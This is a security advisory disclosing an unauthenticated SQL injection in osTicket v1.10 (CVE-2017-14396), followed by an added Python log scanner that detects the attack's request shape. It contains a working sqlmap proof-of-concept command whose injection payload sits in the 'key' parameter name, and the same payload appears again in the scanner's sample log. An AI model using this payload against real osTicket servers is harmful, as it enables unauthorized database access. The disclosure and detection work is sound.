1. ADVISORY INFORMATION
========================================
Title: osTicket v1.10 Unauthenticated SQL Injection
Application: osTicket
Bugs: SQL Injection
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Authentication Required: NO
Versions Affected: <= v1.10
Technology: PHP
Vendor URL: http://osticket.com/
CVSSv3 Score: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Date found: 12 Sep 2017
Author: Mehmet Ince
Advisory: https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/

2. CREDIT
========================================
This vulnerability was identified during a penetration test by Mehmet INCE from PRODAFT / INVICTUS.

3. VERSIONS AFFECTED
========================================
osTicket < 1.10

5. Technical Details & POC
========================================
Please visit the advisory URL for technical details.

PoC code:

    python sqlmap.py -u "http://target/file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311" --dbms MySQL

6. RISK
========================================
The vulnerability allows remote attackers to execute a SQL query on the database system.

7. REFERENCES
========================================
Advisory | osTicket v1.10 Unauthenticated SQL Injection (CVE-2017-14396):
https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/
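
Added example (not part of the original advisory): a log check for the request shape seen in the PoC, where the SQL fragment sits inside the array subscript of the `key` parameter name rather than in a value. The combined-format log layout, the sample lines and the set of characters treated as a benign subscript are assumptions.

```python
import re
from urllib.parse import unquote

# Request target in a combined-format access log line (assumed layout).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Decoded parameter names of the form name[subscript].
ARRAY_PARAM = re.compile(r"([^\[\]]+)\[(.*)\]", re.S)
# Assumption: a benign subscript is an identifier or index; brackets are
# allowed so nested arrays such as a[b][c] are not flagged.
SAFE_SUBSCRIPT = re.compile(r"[A-Za-z0-9_.\[\]-]*")

# Constructed sample lines; the first carries the query string from the PoC.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Sep/2017:10:00:00 +0000] "GET /file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311 HTTP/1.1" 200 512',
    '198.51.100.8 - - [12/Sep/2017:10:00:05 +0000] "GET /file.php?key[id]=7&signature=ab12&expires=15104725311 HTTP/1.1" 200 512',
    '198.51.100.9 - - [12/Sep/2017:10:00:09 +0000] "GET /file.php?key%5Bid%27%5D=1&signature=1 HTTP/1.1" 200 512',
]


def suspicious_subscripts(target):
    """Return (param, subscript) pairs whose subscript holds unexpected characters."""
    hits = []
    query = target.partition("?")[2]
    for pair in query.split("&"):
        # Split on the first literal '=' before decoding, so an encoded
        # '=' (%3D) inside the parameter name stays part of the name.
        name = unquote(pair.partition("=")[0])
        match = ARRAY_PARAM.fullmatch(name)
        if match and not SAFE_SUBSCRIPT.fullmatch(match.group(2)):
            hits.append((match.group(1), match.group(2)))
    return hits


def scan_log(lines):
    """Return (line_number, param, subscript) for every flagged request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        request = REQUEST.search(line)
        if request:
            target = request.group(1)
            findings.extend((number, p, s) for p, s in suspicious_subscripts(target))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Inspecting only parameter values misses this request, because the payload is part of the parameter name.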